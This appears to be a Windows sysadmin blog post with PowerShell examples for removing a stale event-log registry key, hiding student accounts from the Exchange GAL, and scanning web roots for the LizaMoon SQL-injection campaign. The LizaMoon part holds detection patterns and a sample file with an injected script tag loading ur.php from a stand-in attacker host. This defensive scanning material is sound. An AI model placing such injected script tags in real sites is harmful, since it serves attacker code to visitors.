PowerShell Logs

Some time ago on Server 2003 the Windows PowerShell event log replaced the older PowerShell event log. Initially both logs appeared in Event Viewer and the old PowerShell event log filled up with errors. The fix is to remove the registry key that still registers the old log:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Eventlog\PowerShell

Unfortunately some Windows updates recreate the PowerShell key, so check for it occasionally and remove it again when it reappears. Remove only the PowerShell key: the sibling Windows PowerShell key under the same Eventlog branch is the replacement log and must stay.
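An added example (not the original post's own procedure) that does the recurring check from an elevated PowerShell prompt: it refuses to act unless the replacement Windows PowerShell key is present, exports the stale key to a .reg file before deleting it, and supports -WhatIf so it can be dry-run or dropped into a scheduled task. The backup path under $env:TEMP is an assumption; change it to suit.

```powershell
# Added example, not from the original page. Run elevated.
# Key path is the one named in the text; backup location is an assumption.
$StaleKey       = 'HKLM:\SYSTEM\CurrentControlSet\Services\EventLog\PowerShell'
$ReplacementKey = 'HKLM:\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell'

function Remove-StalePowerShellLog {
    [CmdletBinding(SupportsShouldProcess)]
    param(
        [string]$Path        = $StaleKey,
        [string]$Replacement = $ReplacementKey,
        [string]$BackupDir   = $env:TEMP
    )

    if (-not (Test-Path -Path $Path)) {
        Write-Verbose "No stale key at $Path; nothing to do."
        return $false
    }
    # Safety check: only the old log should go; if the replacement log is not
    # registered, something else is wrong and we should not touch the machine.
    if (-not (Test-Path -Path $Replacement)) {
        throw "Replacement key $Replacement is missing; refusing to remove $Path."
    }

    # reg.exe wants HKLM\... rather than the HKLM:\ PSDrive form.
    $regPath = $Path -replace '^HKLM:\\', 'HKLM\'
    $backup  = Join-Path $BackupDir ('PowerShell-EventLog-{0:yyyyMMdd-HHmmss}.reg' -f (Get-Date))
    reg.exe export $regPath $backup /y | Out-Null
    if ($LASTEXITCODE -ne 0) {
        throw "Backup of $regPath to $backup failed; not removing the key."
    }
    Write-Verbose "Stale key exported to $backup"

    if ($PSCmdlet.ShouldProcess($Path, 'Remove registry key')) {
        Remove-Item -Path $Path -Recurse -Force
    }
    return $true
}

# Dry run first, then for real; returns $true when a stale key was found.
Remove-StalePowerShellLog -WhatIf
Remove-StalePowerShellLog -Verbose
```

A reboot (or restart of the Windows Event Log service) is needed before Event Viewer stops listing the old log; the .reg export lets you put the key back with reg.exe import if anything depends on it.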

Rendering Student Entries Invisible in the GAL

You would think that setting the Exchange attribute msExchHideFromAddressLists to TRUE on an AD entry would be enough to hide it from the GAL. However, if the entry still carries values in showInAddressBook (the multi-valued attribute listing the address lists an object appears in), those values override the hide flag. I used the Quest AD cmdlets to find and fix the rogue entries. The command below did the job:

Get-QADUser -SizeLimit 0 -SearchRoot 'ads.qub.ac.uk/QUB/Student' -IncludedProperties showInAddressBook | Where-Object { $_.showInAddressBook -ne $null } | Set-QADUser -ObjectAttributes @{ msExchHideFromAddressLists = "TRUE"; showInAddressBook = "" }
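The same clean-up with Microsoft's ActiveDirectory module instead of the Quest cmdlets, as an added example that is not the original post's command. It selects the affected objects server-side with an LDAP filter, writes a CSV of what it is about to change, and supports -WhatIf. The search base is an assumption: it is the DN form of the canonical path used above and must be adjusted for your forest.

```powershell
# Added example, not from the original page.
# ASSUMPTION: the student OU DN below is derived from 'ads.qub.ac.uk/QUB/Student'.
Import-Module ActiveDirectory

$StudentOU = 'OU=Student,OU=QUB,DC=ads,DC=qub,DC=ac,DC=uk'

function Get-GalLeakingUser {
    param([string]$SearchBase = $StudentOU)
    # Only objects still carrying showInAddressBook values need touching.
    # The LDAP filter does that selection on the DC instead of after retrieval.
    Get-ADUser -SearchBase $SearchBase -LDAPFilter '(showInAddressBook=*)' `
        -Properties msExchHideFromAddressLists, showInAddressBook |
        Select-Object SamAccountName, DistinguishedName,
            @{ n = 'HideFlag';     e = { $_.msExchHideFromAddressLists } },
            @{ n = 'AddressLists'; e = { @($_.showInAddressBook) -join ';' } }
}

function Hide-GalLeakingUser {
    [CmdletBinding(SupportsShouldProcess)]
    param([string]$SearchBase = $StudentOU)
    foreach ($u in Get-GalLeakingUser -SearchBase $SearchBase) {
        if ($PSCmdlet.ShouldProcess($u.DistinguishedName, 'Hide from GAL')) {
            # Set the hide flag and clear the address-list membership in one write,
            # so the Exchange address list service has no reason to re-add the user.
            Set-ADUser -Identity $u.DistinguishedName `
                -Replace @{ msExchHideFromAddressLists = $true } `
                -Clear showInAddressBook
        }
    }
}

# Report and keep a copy first, dry-run, then apply.
Get-GalLeakingUser | Export-Csv -NoTypeInformation -Path .\gal-leak-before.csv
Hide-GalLeakingUser -WhatIf
Hide-GalLeakingUser -Verbose
```

On an organisation with the Exchange management shell available, Set-Mailbox -HiddenFromAddressListsEnabled $true is the supported way to do this for mail-enabled objects and keeps showInAddressBook consistent for you; the direct attribute edit above is for entries that Exchange does not own.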

Grepping for LizaMoon-infected website files

The LizaMoon attack is a mass SQL injection against Microsoft SQL Server-backed websites; it injects <script> tags pointing at a ur.php URL into site content. Because the injection lands in database content rather than static files, a file scan alone will miss it on a dynamic site and the tables that feed the pages need checking too. Although we are primarily using Unix/Linux servers I performed some scans of the web roots using the following to check for LizaMoon infection (-H prints the name of each matching file):

find . -type f -exec grep -EH '<script src=http://.*/ur\.php' {} +

On Windows Server I used PowerShell and the following command (-File skips directory entries, and the dot is escaped so only a literal ur.php matches):

Get-ChildItem -Path . -Recurse -File | Select-String -Pattern 'ur\.php'
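An added example, not the original post's command, that turns the ur.php string match into a scan reporting file, line, injected URL and remote host, so the hits can be grouped into a block list. The regular expression generalises the one-liners above to quoted or unquoted src attributes and to http or https; the sample files it scans are constructed here so it runs offline, and attacker.example is a placeholder host, not a real indicator.

```powershell
# Added example, not from the original page.
# ASSUMPTION: the pattern is a generalisation of the page's grep; anything it
# flags still needs a manual look at the surrounding content.
$InjectedScriptPattern = '<script\s+src=["'']?(?<url>https?://(?<host>[^/"''\s>]+)[^"''\s>]*/ur\.php)["'']?\s*>'

function Find-InjectedScript {
    param(
        [string]$Path = '.',
        # Only scan content types a web server would actually serve or execute.
        [string[]]$Include = @('*.htm', '*.html', '*.asp', '*.aspx', '*.php', '*.js', '*.inc')
    )
    Get-ChildItem -Path $Path -Recurse -File -Include $Include |
        Select-String -Pattern $InjectedScriptPattern |
        ForEach-Object {
            $m = $_.Matches[0]
            [pscustomobject]@{
                File = $_.Path
                Line = $_.LineNumber
                Host = $m.Groups['host'].Value
                Url  = $m.Groups['url'].Value
            }
        }
}

# Constructed sample tree so the scan can be tried offline (not real incident data).
$sample = Join-Path $env:TEMP 'lizamoon-scan-demo'
New-Item -ItemType Directory -Path $sample -Force | Out-Null
Set-Content -Path (Join-Path $sample 'index.html') -Value @(
    '<html><body>Hello</body>',
    '<script src=http://attacker.example/ur.php></script></html>'
)
Set-Content -Path (Join-Path $sample 'about.html') -Value '<html><body>Clean page</body></html>'

$hits = Find-InjectedScript -Path $sample
$hits | Format-Table -AutoSize

# One row per remote host: the IOC / block-list summary for the proxy or firewall.
$hits | Group-Object Host | Select-Object Name, Count
```

Point -Path at the web root for a real scan; the Host column is the thing to block and search for in proxy logs, and the File/Line pairs are what to clean or restore from backup.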